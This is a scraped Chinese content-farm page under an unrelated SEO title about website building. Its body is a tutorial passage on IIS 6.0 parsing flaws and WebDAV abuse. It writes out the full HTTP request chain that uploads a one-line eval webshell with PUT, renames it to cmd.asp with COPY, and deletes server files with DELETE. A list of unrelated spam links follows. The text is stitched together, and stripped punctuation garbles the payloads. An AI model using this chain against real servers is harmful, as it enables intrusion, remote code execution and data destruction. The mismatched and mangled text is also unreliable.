当前位置: 首页 > news >正文

网站建设流程体会襄阳网站seo厂家

news 2025/10/16 3:11:31
网站建设流程体会,襄阳网站seo厂家,深圳网络推广引流,企业融资的方式有哪几种IIS 6.0在解析文件时存在以下两个解析漏洞。 ①当建立*.asa、*.asp格式的文件夹时#xff0c;其目录下的任意文件都将被IIS当作asp文件来解析。 例如#xff1a;建立文件夹 parsing.asp#xff0c;在 parsing.asp 文件夹内新建一个文本文档 test.txt#xff0c;其内容为其目录下的任意文件都将被IIS当作asp文件来解析。 例如建立文件夹 parsing.asp在 parsing.asp 文件夹内新建一个文本文档 test.txt其内容为%NOW%然后在浏览器内访问。 “NOW”是ASP提供获取当前时间的函数TXT是文本文档格式IIS是不会去解析此类文件的应该会直接显示其内容而在 parsing.asp文件夹中却被当作ASP脚本来解析。 ② 当文件为*.asp1.jpg时IIS 6.0同样会以ASP脚本来执行如新建文件 test.asp1.jpg内容为%NOW% 微软并不认为这是一个漏洞也一直没有推出IIS 6.0的补丁所以这两个漏洞至今还存在让无数的网站“死”在了IIS 6.0解析漏洞之上。 说到IIS容器就不得不提起一个经典的漏洞漏洞名为WebDav。 WebDavWeb-based Distributed Authoring and Versioning是一种基于HTTP1.1协议的通信协议它扩展了HTTP协议在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法使HTTP协议更强大。 在开启WebDav扩展的服务器后如果支持PUT、Move、Copy、Delete等方法就可能会存在一些安全隐患比如www.secbug.org服务器IIS 6.0 Web容器支持WebDav并且存在PUT、Move、Copy、Delete等方法那么攻击者就可能通过PUT方法向服务器上传危险脚本文件测试步骤如下。 第一步通过OPTIONS探测服务器所支持的HTTP方法。请求 OPTIONS / HTTP/1.1 Host:www.secbug.org 响应 HTTP/1.1 200 OK Cache-Control:private Date: Mon,19 Aug 2013 09:41:45 GMT Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPPATCH, SEARC H,MKCOL,LOCK,UNLOCK Content-Length: 0 Accept-Ranges: none Server: Microsoft-IIS/6.0 MS-Author-Via: DAV DASL:DAV:sqlDAV: 1, 2 Public:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,POST,COPY,MOVE,MKCOL,PROPFIND,PROPPATCH,LOCK,UNLOCK,SEARCH Set-Cookie:_D_SID89113465;path/; 第二步通过PUT方法向服务器上传脚本文件。 请求 PUT/a.txt HTTP/1.1 Host:www.secbug.org Content-Length:30 %eval request(chopper)% 响应 HTTP/1.1 201 Created Date: Mon,19 Aug 2013 09:48:10 GMT Allow:OPTIONS,TRACE,GET,HEAD,DELETE,PUT,COPY,MOVE,PROPFIND,PROPPATCH, SEARCH,LOCK,UNLOCK Content-Length: 0 Location:http://www.secbug.org/a.txt Server: Microsoft-IIS/6.0 第三步通过Move或Copy方法改名 COPY /a.txt HTTP/1.1 Host:www.secbug.org Destination:http://www.secbug.org/cmd.asp HTTP/1.1 201 Created Date: Mon,19 Aug 2013 09:53:43 GMT Content-Length: 0 Content-Type: text/xml Location:http://www.secbug.org/cmd.asp Server: Microsoft-IIS/6.0 通过这三个步骤攻击者就可以轻易获取一个WebShell。 如果服务器开启了DELETE方法攻击者还可以删除服务器上的任意文件。 DELETE /a.txt HTTP/1.1 Host:www.secbug.org HTTP/1.1 200 OK Date: Mon,19 Aug 2013 10:02:08 GMT Content-Length: 0 Server: Microsoft-IIS/6.0 Set-Cookie: _D_SID89113465; path/;
http://www.tj-hxxt.cn/news/221572.html

相关文章:

  • 网站提供哪些服务放网站的图片做多大分辨率
  • 苏州建网站android软件开发下载
  • 门户网站建设管理工作的意见学做网站php吗
  • 用dw做网站的空格怎么打网站建设可以帮助企业
  • 定制建站公司dw做网站有哪些用处
  • 小鱼儿外贸建站招聘网找工作
  • 企业产品推广网站wordpress wp.media
  • 公司的网站建设费用怎么入账代理上网
  • 公司网站建设注意什么网站建设那家好
  • 网站开发询价单做网站的设计公司
  • 自助建站系统介绍网站公司如何推广网站
  • 网站建设个人主页图网站开发所需开发环境
  • 江苏省住房建设厅网站首页怎么做一个电商网站吗
  • 学校网站开发模式广州模板建站公司
  • 四川网站网页设计在手机上创建网站
  • 怎么做网站企业介绍萍乡公司做网站
  • 南通市住房和城乡建设厅网站wordpress标题调用
  • 网站建设与管理感想手机网站 禁止缩放
  • 快件网站建设网站制作西安
  • 济南网络建站模板百度排名竞价
  • 昆山建设网站上海网站排名优化价格
  • 当前主流的网站开发语言账号权重查询
  • 体育馆做网站公司网页报价单怎么做
  • 网站推广软件免费版可tv外贸网站建设视频教程
  • 网站登录注册页面模板wordpress图片中文不显示解决
  • 药品网站建设存在的问题农安县建设局官方网站
  • 网站制作网页制作网页建站如何保存分享
  • 网站建设既有书籍又有光盘网络建站 响应式网站
  • 建设机械网站wordpress邀请会员
  • wordpress头像同步网站优化怎么样